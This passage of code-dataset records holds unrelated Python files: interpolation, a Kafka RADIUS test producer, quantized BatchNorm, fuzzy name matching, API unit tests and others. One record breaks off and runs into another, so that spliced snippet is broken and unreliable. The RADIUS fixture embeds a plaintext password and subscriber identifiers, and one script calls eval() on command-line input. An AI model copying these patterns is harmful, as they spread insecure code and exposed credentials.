sin\n k = len(y)\n var1 = 0\n for i in range(k):\n var2 = 1\n for j in range(k):\n if j != i:\n var2 *= sin(0.5*(X-x[j]))/sin(0.5*(x[i]-x[j]))\n var1 += y[i]*var2\n return var1\n\n\nif __name__=='__main__':\n from sys import argv\n from random import uniform\n a = eval(argv[2])\n b = eval(argv[3])\n x, y = [], []\n p = 0\n for i in range(a[0],(a[-1]+1)*10):\n x.append(p)\n p+=0.1\n if argv[1]=='pol': \n y=[interpol_poly(a,b,i) for i in x]\n elif argv[1]=='tryg':\n y=[interpol_tryg(a,b,i) for i in x]\n\t\n draw(a,b,'o',x,y)\n","sub_path":"interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"308498677","text":"#!/usr/bin/env python\nimport json\n\nfrom kafka import KafkaProducer\n\nPRODUCER = KafkaProducer(\n bootstrap_servers='localhost:9092',\n value_serializer=lambda v: json.dumps(v).encode('utf-8')\n)\n\n\nACCT = {\n 'NAS-IP-Address': '172.16.244.54',\n 'Acct-Status-Type': 'Alive',\n 'Acct-Input-Packets': 107,\n 'NAS-Identifier': 'TEH-Hekmatshoar',\n 'Acct-Session-Id': '81658ddf',\n 'NAS-Port-Type': 'Ethernet',\n 'Acct-Input-Octets': 8673,\n 'Acct-Session-Time': 240,\n 'Service-Type': 'Framed-User',\n 'Acct-Output-Gigawords': 0,\n 'Acct-Output-Octets': 36001,\n 'Acct-Delay-Time': 0,\n 'Framed-Protocol': 'PPP',\n 'Acct-Authentic': 'RADIUS',\n 'Acct-Input-Gigawords': 0,\n 'Calling-Station-Id': '90:F6:52:B0:91:C5',\n 'NAS-Port': 15880901,\n 'Event-Timestamp': 1480408761,\n 'User-Name': u'2177896179',\n 'NAS-Port-Id': 'ether2-Dslam 1',\n 'Acct-Output-Packets': 99,\n 'Framed-IP-Address': '5.202.240.27',\n 'Called-Station-Id': 'Hekmat1'\n}\n\nAUTH = {\n 'NAS-IP-Address': '5.202.252.1',\n 'User-Name': u'2166716182',\n 'User-Password': '123456',\n 'NAS-Port-Id': u'ether2-DSLAM',\n 'Called-Station-Id': u'Hafez',\n 'Framed-Protocol': 'PPP',\n 'Service-Type': 'Framed-User',\n 'NAS-Identifier': u'TEH-Hafez',\n 'NAS-Port-Type': 'Ethernet',\n 'Reply-Message': u'E=907',\n 'Calling-Station-Id': u'00:E9:08:58:D1:36',\n 'NAS-Port': 15978145,\n 'start_timestamp': 1480860610,\n 'end_timestamp': 1480860615,\n 'packet_source': 'IBS',\n 'Cisco-AVPair': [\n 
u'actual-data-rate-upstream=511',\n u'actual-data-rate-downstream=16229',\n u'maximum-interleaving-delay-downstream=0',\n u'actual-interleaving-delay-upstream=20',\n u'actual-interleaving-delay-downstream=8',\n u'client-mac-address=0027.1918.eef1',\n u'circuit-id-tag=PTE-THE-Malekashtar2 atm 12/3:0.35'\n ]\n}\n\nfor i in xrange(10):\n PRODUCER.send('radius_acct', ACCT)\n PRODUCER.send('radius_auth', AUTH)\n\nPRODUCER.flush()\n","sub_path":"server_scripts/radius/populate_radius_spout.py","file_name":"populate_radius_spout.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"139086847","text":"class Solution:\n def convert(self, s: str, numRows: int) -> str:\n if numRows <= 0:\n raise RuntimeError(\"illegal numRows.\")\n if numRows == 1 or numRows >= len(s):\n return s\n step = numRows + numRows - 2#numRows*2 minus the head and tail rows, because the zigzag goes down and folds back up\n c = ['' for i in range(numRows)]\n print('c',c)\n for i in range(len(s)) :\n mod = i % step\n print('step',step,'mod',mod)\n if mod < numRows :#note: not mod None:\n super(_QuantizedBatchNorm,\n self).__init__(num_features, eps, momentum, affine, track_running_stats)\n\n assert rt_spec, 'Runtime spec must be provided for quantized module'\n self.rt_spec = rt_spec\n\n self.running_mean_quantizer = rt_spec.maybe_get_weight_quantizer('running_mean')\n self.running_var_quantizer = rt_spec.maybe_get_weight_quantizer('running_var')\n\n self.weight_quantizer = rt_spec.maybe_get_weight_quantizer('weight')\n self.bias_quantizer = rt_spec.maybe_get_weight_quantizer('bias')\n\n @property\n def is_quantized(self):\n return True\n\n def forward(self, input: Tensor) -> Tensor:\n self._check_input_dim(input)\n\n # exponential_average_factor is set to self.momentum\n # (when it is available) only so that it gets updated\n # in ONNX graph when this node is exported to ONNX.\n if self.momentum is None:\n exponential_average_factor = 0.0\n else:\n exponential_average_factor = self.momentum\n\n if self.training and self.track_running_stats:\n # TODO: if statement only here to tell the jit to skip emitting this when it is None\n if self.num_batches_tracked is not None: # type: ignore[has-type]\n self.num_batches_tracked.add_(1) # type: ignore[has-type]\n if self.momentum is None: # use cumulative moving average\n exponential_average_factor = 1.0 / float(self.num_batches_tracked)\n else: # use exponential moving average\n exponential_average_factor = self.momentum\n r\"\"\"\n Decide whether the mini-batch stats should be used for normalization rather than the buffers.\n Mini-batch stats are used in training mode, and in eval mode when buffers are None.\n \"\"\"\n if self.training:\n bn_training = True\n else:\n bn_training = (self.running_mean is None) and (self.running_var is None)\n r\"\"\"\n Buffers are only updated if they are to be tracked and we are in training mode. Thus they only need to be\n passed when the update should occur (i.e. in training mode when they are tracked), or when buffer stats are\n used for normalization (i.e. 
in eval mode when buffers are not None).\n \"\"\"\n\n running_mean = self.running_mean_quantizer(\n self.running_mean) if self.running_mean_quantizer else self.running_mean\n running_var = self.running_var_quantizer(\n self.running_var) if self.running_var_quantizer else self.running_var\n\n weight = self.weight_quantizer(\n self.weight) if self.weight_quantizer else self.weight\n bias = self.bias_quantizer(self.bias) if self.bias_quantizer else self.bias\n\n return F.batch_norm(\n input,\n # If buffers are not to be tracked, ensure that they won't be updated\n running_mean if not self.training or self.track_running_stats else None,\n running_var if not self.training or self.track_running_stats else None,\n weight,\n bias,\n bn_training,\n exponential_average_factor,\n self.eps,\n )\n\n @classmethod\n def from_float(cls, mod, rt_spec):\n \"\"\"Create a quantized module from a float module.\"\"\"\n assert rt_spec, 'Runtime spec must be provided for quantized module.'\n assert type(mod) == cls._FLOAT_MODULE, \\\n '{}.from_float() only accepts {}, but got {}'.format(\n cls.__name__, cls._FLOAT_MODULE, type(mod))\n\n norm = cls(\n mod.num_features,\n mod.eps,\n mod.momentum,\n mod.affine,\n mod.track_running_stats,\n rt_spec=rt_spec)\n\n norm.weight = mod.weight\n norm.bias = mod.bias\n norm.running_mean = mod.running_mean\n norm.running_var = mod.running_var\n norm.num_batches_tracked = mod.num_batches_tracked\n return norm\n\nclass QuantizedBatchNorm2d(_QuantizedBatchNorm):\n _FLOAT_MODULE = nn.BatchNorm2d\n\n def _check_input_dim(self, input):\n nn.BatchNorm2d._check_input_dim(self, input)\n\nclass QuantizedBatchNorm3d(_QuantizedBatchNorm):\n _FLOAT_MODULE = nn.BatchNorm3d\n\n def _check_input_dim(self, input):\n nn.BatchNorm3d._check_input_dim(self, input)\n","sub_path":"src/vai_quantizer/vai_q_pytorch/pytorch_binding/pytorch_nndct/nn/quantization/modules/batchnorm.py","file_name":"batchnorm.py","file_ext":"py","file_size_in_byte":5313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"86371860","text":"import web\nimport urllib\nimport urllib2\nimport json\nimport re\n\n# Returns a list of songs(playlist).\n# The titles of the songs in the row form the initial text (without chars like spaces, commas etc)\ndef getPlaylist(text):\n tokens = re.split(r\"[\\s\\+*.,!\\?]+\",text)\n playlist = getSonglist(tokens)\n return playlist\n\n# Returns a list of songs.\n# Forward chaining, depth-first.\n# LongestMatch.\ndef getSonglist(tokens=[], minSongSize=1, maxSongSize=5):\n length = len(tokens)\n for j in range(min(length,maxSongSize),minSongSize-1,-1):\n songTitle= \" \".join(tokens[0:j])\n song = findSongByTilte(songTitle)\n songlist = []\n if (song):\n subplaylist = getSonglist(tokens[j:],minSongSize, maxSongSize)\n if (len(subplaylist)>0 or j==length):\n songlist.insert(0,song)\n songlist += subplaylist\n return songlist\n return []\n\n# TO DO: Search to other pages if nothing found.\n# TO DO: The url of spotify Metadata API doesn t belong here.\n# Returns song, the title of which matches the query string.\n# Uses the Spotify Metadata API to find songs.\ndef findSongByTilte(query):\n title_s = query.lower().strip()\n q = 'title:'+ title_s\n params = {'q': q, 'page': 1}\n url = 'http://ws.spotify.com/search/1/track.json?'\n url += urllib.urlencode(params)\n request = urllib2.Request(url)\n response = urllib2.urlopen(request)\n tracks = json.load(response)['tracks']\n #trackresults = []\n for track in tracks:\n if 
(track['name'].lower().strip() == title_s):\n trackresult = {\"uri\": track['href'], \\\n \"trackname\": track['name']}\n return trackresult\n #trackresults.append(trackresult)\n return ''\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"105591241","text":"import jellyfish as jf\nimport pandas as pd\nimport numpy as np\nimport fuzzy as fz\nimport unicodedata\nimport itertools\nimport re\n\n#performs fuzzy string matching based on a combination of edit distance and phonetic sounds\nclass fuzzyMatch:\n\n def __init__(self,fromVec):\n\n self.fromVec = fromVec\n\n #performs fuzzy string matching based on a combination of edit distance and phonetic sounds\n \n def matchNames(self,toVec,minMatchRatio=0.885):\n \n #creates 4 different kinds of sound vectors\n def transcribePhonetic(vec): \n DM = fz.DMetaphone(20)\n SX = fz.Soundex(4)\n if type(vec)!=pd.core.series.Series:\n vec = pd.Series(vec)\n vec = vec.map(lambda x: re.sub('\s+',' ',\n re.sub(r\"[^\w'\s-]\", '',\n unicodedata.normalize('NFKD', unicode(x)).encode('ascii', 'ignore')))\n .strip().replace(' - ','-'))\n df = vec.map(lambda x: [x]+DM(unicode(x))+[fz.nysiis(unicode(x))]+[jf.match_rating_codex(unicode(x))]+[jf.soundex(unicode(x))]).apply(pd.Series)\n df.loc[:,0] = df.loc[:,0].map(lambda x: x.lower().replace('-',' ').replace(\"'\",\"\"))\n return df\n \n #remove matches from both matchee (frDF) and matcher (toDF) lists\n def removeMatches(frDF,toDF,mtchDF):\n frDF = frDF.loc[~frDF.loc[:,6].isin(mtchDF.loc[:,'Original']),:]\n toDF = toDF.loc[~toDF.loc[:,6].isin(mtchDF.loc[:,'Match']),:]\n return frDF,toDF\n \n #Only choose matches that meet the minimum edit-distance ratio\n def filterByEditDist(mrgDF,minMatchRatio=0.885):\n if mrgDF.empty:\n return mrgDF\n mrgDF['Dist'] = mrgDF.apply(lambda x: jf.jaro_winkler(unicode(x[0]),unicode(x[1])),axis=1)\n mrgDF = mrgDF.groupby('Original').apply(lambda x: x[x.Dist==x.Dist.max()]).reset_index(drop=True)\n return mrgDF.loc[mrgDF['Dist']>=minMatchRatio,['Original','Match']]\n \n #Find all matching rows between 2 dataframes where only k of N columns match\n def mergeOnKofNCols(frDF,toDF,colNames,k):\n colCmbns = [[1]+list(x) if x[0]==2 else list(x) for x in list(itertools.combinations(colNames,k))]\n mrgDF = pd.DataFrame(columns=['Original','Match'])\n for x in colCmbns:\n mrgDF = pd.concat([mrgDF,pd.merge(frDF,toDF,on=list(x),how='inner').loc[:,['6_x','6_y']].rename(columns={'6_x':'Original','6_y':'Match'})])\n return mrgDF.drop_duplicates()\n\n #if inputs empty\n frVec = self.fromVec\n if len(frVec)==0 or len(toVec)==0:\n return pd.DataFrame(columns=['Original','Match'])\n \n #remove duplicates\n frVec = frVec.drop_duplicates()\n toVec = toVec.drop_duplicates()\n\n #Transcribe names phonetically \n frDF = transcribePhonetic(frVec)\n toDF = transcribePhonetic(toVec)\n\n #Concatenate with deduplicated list\n frDF = pd.concat([frDF.reset_index(drop=True),frVec.reset_index(drop=True)],axis=1,ignore_index=True)\n toDF = pd.concat([toDF.reset_index(drop=True),toVec.reset_index(drop=True)],axis=1,ignore_index=True)\n \n #first match directly on ASCII\n mtchDF = pd.merge(frDF,toDF,on=0,how='inner').loc[:,['6_x','6_y']].rename(columns={'6_x':'Original','6_y':'Match'})\n frDF, toDF = removeMatches(frDF,toDF,mtchDF)\n if frDF.empty or toDF.empty:\n return mtchDF\n\n #second match on all phonetic sounds\n phoneCols = [1,2,3,4,5]\n mrgDF = 
pd.merge(frDF.loc[:,1:6],toDF.loc[:,1:6],on=phoneCols,how='inner').iloc[:,[-1,-2]].rename(columns={'6_x':'Original','6_y':'Match'})\n mtchDF = pd.concat([mtchDF,mrgDF])\n frDF, toDF = removeMatches(frDF,toDF,mtchDF)\n if frDF.empty or toDF.empty:\n return mtchDF\n\n #third match on any k of n phonetic sounds in descending order of k\n for k in reversed(range(1,len(phoneCols)-1)):\n mrgDF = mergeOnKofNCols(frDF,toDF,phoneCols,k)\n #use edit distance to break ties\n mrgDF = filterByEditDist(mrgDF,minMatchRatio)\n mtchDF = pd.concat([mtchDF,mrgDF])\n frDF, toDF = removeMatches(frDF,toDF,mtchDF)\n if frDF.empty or toDF.empty:\n return mtchDF\n\n #Finally match by edit distance only\n mrgDF = pd.merge(frDF.assign(key=1),toDF.assign(key=1),on='key',how='outer').loc[:,['6_x','6_y']].rename(columns={'6_x':'Original','6_y':'Match'})\n\n #use edit distance to break ties\n mrgDF = filterByEditDist(mrgDF,minMatchRatio)\n mtchDF = pd.concat([mtchDF,mrgDF])\n frDF, toDF = removeMatches(frDF,toDF,mtchDF)\n\n self.matches = mtchDF\n\n return mtchDF\n\n #Use matchNames to replace items in vector with its corresponding match in another vector or dataframe\n def rplcNames(self,mtchDF=[],enforceMatch=True,minMatchRatio=0.885):\n\n frVec = self.fromVec\n if len(mtchDF)==0:\n mtchDF = self.matches\n\n if not isinstance(mtchDF, pd.DataFrame):\n toVec = mtchDF\n mtchDF = self.matchNames(toVec,minMatchRatio)\n \n frVec = pd.Series(frVec)\n rplcVec = frVec.map(mtchDF.set_index('Original')['Match'])\n \n #enforceMatch forces all items in frVec to be matched with toVec else error\n if not enforceMatch:\n rplcVec.loc[pd.isnull(rplcVec)] = frVec.loc[pd.isnull(rplcVec)]\n else:\n if sum(pd.isnull(rplcVec)*1)>0:\n return 'Error, Not everything matched!'\n \n return rplcVec\n\n #Performs nested match where matches must be within grouped subsets (e.g. markets must match within adm1 and adm2 districts)\n def grpByMatch(self,dfRplc,cols):\n\n dfSub = self.fromVec\n\n #First find and replace the first column\n findVec = dfSub.loc[:,cols[0]].drop_duplicates().reset_index(drop=True)\n rplcVec = dfRplc.loc[:,cols[0]].drop_duplicates().reset_index(drop=True)\n toSubVec = fuzzyMatch(findVec).matchNames(rplcVec).set_index('Original')['Match']\n dfSub.loc[:,cols[0]] = dfSub.loc[:,cols[0]].replace(toSubVec.to_dict())\n \n if len(cols)>1:\n #Now progressively increase the set of group by columns\n for i in range(1,len(cols)):\n grpByCols = cols[0:i]\n mtchCol = cols[i]\n \n #create groups from group by cols\n grouped = dfSub.loc[:,grpByCols+[mtchCol]].groupby(grpByCols)\n for name, group in grouped:\n \n #vector of names to be replaced\n findVec = group.loc[:,mtchCol].drop_duplicates().dropna().reset_index(drop=True)\n #vector of substitute names to be matched to\n rplcDf = pd.merge(dfRplc.loc[:,grpByCols+[mtchCol]].drop_duplicates(),group.loc[:,grpByCols].drop_duplicates(),on=grpByCols)\n rplcVec = rplcDf.loc[:,mtchCol].drop_duplicates().dropna().reset_index(drop=True)\n \n #perform fuzzy match\n if not findVec.empty and not rplcVec.empty:\n toSubVec = fuzzyMatch(findVec).matchNames(rplcVec).set_index('Original')['Match']\n \n #substitute results into original DF\n if not toSubVec.empty:\n dfSub.loc[group.index.values,mtchCol] = dfSub.loc[group.index.values,mtchCol].replace(toSubVec.to_dict())\n\n return dfSub\n\n\n#check for and remove extraneous hierachies (e.g. {A}c{A}c{b,e,d} -> {A}c{b,e,d})\ndef groupReduce(df,dfMrr=[]):\n \n #dfMrr mirrors operations on another dataframe of same size (e.g. 
IDs)\n if len(dfMrr)>0:\n dfMrr = dfMrr.reindex(index=df.index)\n\n #Replace nans as they are excluded in groupbys\n df = df.fillna('NULL')\n \n #to store result\n newGrp = pd.DataFrame([]) \n newMrr = pd.DataFrame([])\n \n #group df by first column\n grps = df.groupby(df.columns.tolist()[0])\n for name,grp in grps:\n \n #if mirror df is not empty create slice based on group\n if len(dfMrr)>0: \n mrr = dfMrr.loc[grp.index,:]\n else:\n mrr = pd.DataFrame(columns=grp.columns.tolist())\n \n if grp.iloc[:,1].unique().tolist().__len__()==1 and grp.shape[0]>1:\n #if second column has only one unique value and is greater than length 1 then shift df 1 column to left\n if grp.shape[1]>2:\n grp.iloc[:,1:-1] = grp.iloc[:,2:].values\n mrr.iloc[:,1:-1] = mrr.iloc[:,2:].values\n \n #set last column to null\n grp.iloc[:,-1] = np.nan\n if not mrr.empty: # Mirror operation on mirror slice\n mrr.iloc[:,-1] = np.nan\n \n if grp.shape[1]>2: #recurse\n try:\n rdcGrp,rdcMrr = groupReduce(grp.iloc[:,1:],mrr.iloc[:,1:])\n grp.iloc[:,1:] = rdcGrp.values\n mrr.iloc[:,1:] = rdcMrr.values\n except Exception:\n raise #no debugger hook is defined here; re-raise so errors surface\n \n newGrp = newGrp.append(grp.replace('NULL',np.nan))\n newMrr = newMrr.append(mrr)\n \n return newGrp, newMrr","sub_path":"fuzzyMatch.py","file_name":"fuzzyMatch.py","file_ext":"py","file_size_in_byte":9441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"458869956","text":"# coding = utf-8\nimport unittest\nimport faker\nimport datetime\nfrom pypinyin import lazy_pinyin\nfrom testCase import login\nfrom publicCommon.print_data import PrintData\n\n\nclass StartData(unittest.TestCase):\n u\"\"\"Test module: basic settings\"\"\"\n fake = faker.Faker(locale='zh_CN')\n\n @classmethod\n def setUpClass(cls):\n print('测试模块:基础设置')\n cls.session = login.session\n cls.host = login.host\n cls.headers = login.headers\n cls.yin_hang = \"工商银行\"\n cls.credit_card_number = StartData.fake.credit_card_number()\n cls.now_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n cls.name = StartData.fake.name()\n cls.login_name = ''.join(lazy_pinyin(cls.name))\n cls.number = StartData.fake.phone_number()\n cls.company = StartData.fake.company_prefix()\n\n @classmethod\n def tearDownClass(cls):\n pass\n\n def test_001(self):\n u\"\"\"Department management page\"\"\"\n url = '/Organization/index.html'\n response = '部门管理'\n r = self.session.post(self.host + url, headers=self.headers)\n r_test = r.text\n pr = PrintData(url, r_test, response)\n pr.print_data()\n self.assertIn(response, r_test, '状态码:' + str(r.status_code) + ':页面打开失败')\n\n def test_002(self):\n u\"\"\"Get the company ID\"\"\"\n url = '/Organization/getOrganizationTree'\n response = 200\n r1 = self.session.post(self.host + url, headers=self.headers)\n r1_json = r1.json()\n global cid # company ID\n cid = r1_json[0]['id']\n pr = PrintData(url, r1_json[0], response)\n pr.print_data()\n self.assertEqual(response, r1.status_code, '状态码:' + str(r1.status_code) + ':页面打开失败')\n\n def test_003(self):\n u\"\"\"Add a department\"\"\"\n data = {\n \"type\": 2,\n \"pid\": cid,\n \"cid\": cid,\n \"depart\": self.company\n }\n r1 = self.session.post(self.host + 'Organization/saveOrganization', data=data, headers=self.headers)\n r1_json = r1.json()\n self.assertTrue(r1_json['success'], r1_json['msg'])\n\n def test_004(self):\n u\"\"\"Get the new department's ID\"\"\"\n r2 = self.session.post(self.host + '/Organization/getOrganizationTree', headers=self.headers)\n r2_json = r2.json()\n global depart_id # department ID\n depart_id = r2_json[0]['children'][-1]['id']\n self.assertEqual(200, r2.status_code, '状态码:' + str(r2.status_code) + ':页面打开失败')\n\n def test_005(self):\n u\"\"\"Role permissions page\"\"\"\n r = self.session.post(self.host + '/Role/index.html', headers=self.headers)\n r_test = r.text\n self.assertIn('角色权限', r_test, '状态码:' + str(r.status_code) + ':页面打开失败')\n\n def test_006(self):\n u\"\"\"Add a role\"\"\"\n data = {\n \"name\": \"测试角色权限\"\n }\n r1 = self.session.post(self.host + '/Role/saveRole', data=data, headers=self.headers)\n r1_json = r1.json()\n self.assertTrue(r1_json['success'], r1_json['msg'])\n\n def test_007(self):\n u\"\"\"Get the new role's ID\"\"\"\n r2 = self.session.post(self.host + '/Role/getRoleTree', headers=self.headers)\n r2_json = r2.json()\n global role_id\n role_id = r2_json[-1]['id']\n self.assertEqual(200, r2.status_code, '状态码:' + str(r2.status_code) + ':页面打开失败')\n\n def test_008(self):\n u\"\"\"Company accounts page\"\"\"\n r = self.session.post(self.host + '/CompanyAccount/index.html', headers=self.headers)\n r_test = r.text\n self.assertIn('公司账户', r_test, '状态码:' + str(r.status_code) + ':页面打开失败')\n\n def test_009(self):\n u\"\"\"Add a company account\"\"\"\n data1 = {\n \"id\": \"\",\n \"bank_name\": self.yin_hang,\n \"account_name\": \"test公司账户1\",\n \"account_number\": self.credit_card_number,\n \"account_create_date\": self.now_time,\n \"account_currency_type\": 1,\n \"use\": \"收款\",\n \"status\": 1\n }\n r1 = self.session.post(self.host + 'CompanyAccount/saveAccount', data=data1, headers=self.headers)\n r1_json = r1.json()\n self.assertTrue(r1_json['success'], r1_json['msg'])\n\n def test_010(self):\n u\"\"\"Company account search\"\"\"\n data = {\n \"status\": \"\",\n \"bank_name\": self.yin_hang,\n \"account_number\": self.credit_card_number,\n \"page\": 1,\n \"rows\": 15\n }\n r2 = self.session.post(self.host + '/CompanyAccount/getList', data=data, headers=self.headers)\n r2_json = r2.json()\n self.assertIn(self.credit_card_number, r2_json['rows'][0]['account_number'], '无该公司账户')\n\n def test_011(self):\n u\"\"\"Account management page\"\"\"\n r = self.session.post(self.host + '/Account/index.html', headers=self.headers)\n r_test = r.text\n self.assertIn('登录账号', r_test, '状态码:' + str(r.status_code) + ':页面打开失败')\n\n def test_012(self):\n u\"\"\"Add an account; if this fails, the account limit may have been reached\"\"\"\n data1 = {\n \"login_name\": self.login_name,\n \"name\": self.name,\n \"id\": \"\",\n \"depart_id\": depart_id,\n \"role_id[]\": role_id,\n \"is_operate\": 1,\n \"phone\": self.number\n }\n r1 = self.session.post(self.host + '/Account/addAccount', data=data1, headers=self.headers)\n r1_json = r1.json()\n self.assertTrue(r1_json['success'], r1_json['msg'][0:11])\n\n def test_013(self):\n u\"\"\"Account list; if this fails, the account was not added because of the account limit\"\"\"\n data = {\n \"page\": 1,\n \"rows\": 15\n }\n r = self.session.post(self.host + '/Account/getList', data=data, headers=self.headers)\n r_json = r.json()\n global name_id\n name_id = r_json['rows'][0]['id']\n self.assertIn(self.name, r_json['rows'][0]['name'], r_json['rows'][0]['name'])\n\n def test_014(self):\n u\"\"\"Account search\"\"\"\n data = {\n \"search_name\": name_id,\n \"page\": 1,\n \"rows\": 15\n }\n r = self.session.post(self.host + '/Account/getList', data=data, headers=self.headers)\n r_json = r.json()\n self.assertIn(name_id, r_json['rows'][0]['id'], r_json['rows'][0]['id'])\n\n def test_015(self):\n u\"\"\"Company logo and name page\"\"\"\n r = self.session.post(self.host + '/CompanyLogo/index.html', headers=self.headers)\n r_text = r.text\n self.assertIn('商标及名称修改', r_text, '状态码:' + str(r.status_code) + ':页面打开失败')\n\n def test_016(self):\n u\"\"\"Personal password page\"\"\"\n r = self.session.post(self.host + '/User/account.html', headers=self.headers)\n r_text = r.text\n self.assertIn('个人密码', r_text, '状态码:' + str(r.status_code) + ':页面打开失败')\n\n def test_017(self):\n u\"\"\"Data authorization page\"\"\"\n r = self.session.post(self.host + '/Accredit/index.html', headers=self.headers)\n r_text = r.text\n self.assertIn('数据授权', r_text, '状态码:' + str(r.status_code) + ':页面打开失败')\n","sub_path":"testCase/test1_Start_Data.py","file_name":"test1_Start_Data.py","file_ext":"py","file_size_in_byte":7346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"384775041","text":"#################################################################################\n# WaterTAP Copyright (c) 2020-2023, The Regents of the University of California,\n# through Lawrence Berkeley National Laboratory, Oak Ridge National Laboratory,\n# National Renewable Energy Laboratory, and National Energy Technology\n# Laboratory (subject to receipt of any required approvals from the U.S. Dept.\n# of Energy). All rights reserved.\n#\n# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license\n# information, respectively. These files are also available online at the URL\n# \"https://github.com/watertap-org/watertap/\"\n#################################################################################\n\n\"\"\"Translator blocks for supported property packages\"\"\"\n\nfrom pyomo.environ import Constraint\nfrom idaes.models.unit_models.translator import Translator\nfrom idaes.core.util.scaling import (\n calculate_scaling_factors,\n constraint_scaling_transform,\n get_scaling_factor,\n)\nfrom watertap.examples.flowsheets.full_treatment_train.model_components import (\n property_models,\n)\n\n\ndef build_tb(m, base_inlet=\"ion\", base_outlet=\"TDS\", name_str=None):\n \"\"\"\n Build a translator block to convert for the specified base from inlet to outlet.\n \"\"\"\n\n if name_str is None:\n name_str = \"tb_\" + base_inlet + \"_to_\" + base_outlet\n\n if base_inlet not in [\"ion\", \"salt\"]:\n raise ValueError(\n \"Unexpected property base inlet {base_inlet} for build_tb\"\n \"\".format(base_inlet=base_inlet)\n )\n prop_inlet = property_models.get_prop(m, base=base_inlet)\n\n if base_outlet not in [\"TDS\"]:\n raise ValueError(\n \"Unexpected property base outlet {base_outlet} for build_tb\"\n \"\".format(base_outlet=base_outlet)\n )\n prop_outlet = property_models.get_prop(m, base=base_outlet)\n\n # build translator block\n setattr(\n m.fs,\n name_str,\n Translator(\n inlet_property_package=prop_inlet, outlet_property_package=prop_outlet\n ),\n )\n blk = getattr(m.fs, name_str)\n\n # scale translator block to get scaling factors\n calculate_scaling_factors(blk)\n\n # add translator block constraints\n blk.eq_equal_temperature = Constraint(\n expr=blk.inlet.temperature[0] == blk.outlet.temperature[0]\n )\n constraint_scaling_transform(\n blk.eq_equal_temperature, get_scaling_factor(blk.properties_in[0].temperature)\n )\n blk.eq_equal_pressure = Constraint(\n expr=blk.inlet.pressure[0] == blk.outlet.pressure[0]\n )\n constraint_scaling_transform(\n blk.eq_equal_pressure, get_scaling_factor(blk.properties_in[0].pressure)\n )\n\n if base_inlet == \"ion\" and base_outlet == \"TDS\":\n blk.eq_H2O_balance = Constraint(\n expr=blk.inlet.flow_mass_phase_comp[0, \"Liq\", \"H2O\"]\n == blk.outlet.flow_mass_phase_comp[0, \"Liq\", \"H2O\"]\n )\n constraint_scaling_transform(\n blk.eq_H2O_balance,\n get_scaling_factor(\n blk.properties_out[0].flow_mass_phase_comp[\"Liq\", \"H2O\"]\n ),\n )\n\n blk.eq_TDS_balance = Constraint(\n expr=sum(\n 
blk.inlet.flow_mass_phase_comp[0, \"Liq\", j]\n for j in [\"Na\", \"Ca\", \"Mg\", \"SO4\", \"Cl\"]\n )\n == blk.outlet.flow_mass_phase_comp[0, \"Liq\", \"TDS\"]\n )\n constraint_scaling_transform(\n blk.eq_TDS_balance,\n get_scaling_factor(\n blk.properties_out[0].flow_mass_phase_comp[\"Liq\", \"TDS\"]\n ),\n )\n\n elif base_inlet == \"salt\" and base_outlet == \"TDS\":\n blk.eq_H2O_balance = Constraint(\n expr=blk.inlet.flow_mass_phase_comp[0, \"Liq\", \"H2O\"]\n == blk.outlet.flow_mass_phase_comp[0, \"Liq\", \"H2O\"]\n )\n constraint_scaling_transform(\n blk.eq_H2O_balance,\n get_scaling_factor(\n blk.properties_out[0].flow_mass_phase_comp[\"Liq\", \"H2O\"]\n ),\n )\n\n blk.eq_TDS_balance = Constraint(\n expr=sum(\n blk.inlet.flow_mass_phase_comp[0, \"Liq\", j]\n for j in [\"NaCl\", \"CaSO4\", \"MgSO4\", \"MgCl2\"]\n )\n == blk.outlet.flow_mass_phase_comp[0, \"Liq\", \"TDS\"]\n )\n constraint_scaling_transform(\n blk.eq_TDS_balance,\n get_scaling_factor(\n blk.properties_out[0].flow_mass_phase_comp[\"Liq\", \"TDS\"]\n ),\n )\n\n else:\n raise ValueError(\"Unexpected property base combination for build_tb\")\n\n blk.properties_in[0].mass_frac_phase_comp # touch for initialization\n blk.properties_out[0].mass_frac_phase_comp\n","sub_path":"watertap/examples/flowsheets/full_treatment_train/flowsheet_components/translator_block.py","file_name":"translator_block.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"307735386","text":"# -*- coding: utf-8 -*-\nfrom __future__ import with_statement\nimport csv, codecs, cStringIO\n\n__all__ = ['parse_csv', 'UnicodeWriter', 'UnicodeReader']\n\ndef guess_charset(stream):\n \"\"\"\n Try to guess charset using naive technique - try to read stream\n using given set of charsets, if for any charset everything is read\n without any errors use it.\n \"\"\"\n charsets = ['utf-8', 'cp1250', 'iso8859_2', 'cp852']\n for charset in charsets:\n stream.seek(0)\n try:\n for c in codecs.iterdecode(stream, charset):\n pass\n except:\n continue\n else:\n return charset\n\n return None\n\ndef parse_csv(path, charset = 'cp1250'):\n \"\"\"\n Load a CSV file into memory. Ignore all lines starting with #. 
